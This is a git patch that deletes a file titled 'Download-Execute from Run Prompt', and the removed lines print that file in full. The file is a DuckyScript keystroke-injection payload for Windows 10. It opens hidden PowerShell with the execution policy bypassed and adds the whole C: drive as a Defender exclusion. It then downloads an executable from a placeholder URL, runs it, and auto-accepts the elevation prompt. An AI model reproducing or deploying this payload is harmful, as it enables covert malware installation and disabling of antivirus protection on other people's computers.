From 089606e8f760c6061bdc933b0b2e329d39f7f1db Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 23:16:14 +0000 Subject: [PATCH] Delete Download-Execute from Run Prompt.txt --- Download-Execute from Run Prompt.txt | 23 ----------------------- 1 file changed, 23 deletions(-) delete mode 100644 Download-Execute from Run Prompt.txt diff --git a/Download-Execute from Run Prompt.txt b/Download-Execute from Run Prompt.txt deleted file mode 100644 index ad1d856..0000000 --- a/Download-Execute from Run Prompt.txt +++ /dev/null @@ -1,23 +0,0 @@ -REM Title: Download-Execute from Run Prompt -REM Author: @beigeworm -REM Description: Uses the Run Prompt to download a file and run it. -REM Target: Windows 10 - -REM *SETUP* -REM replace FILE_URL_HERE with the url of your file to run. - -REM some setup for dukie script. -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window). -GUI r -DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1; - -REM replace FILE_URL_HERE below. -STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit - -CTRL-SHIFT ENTER -DELAY 1500 -ALT y -DELAY 5000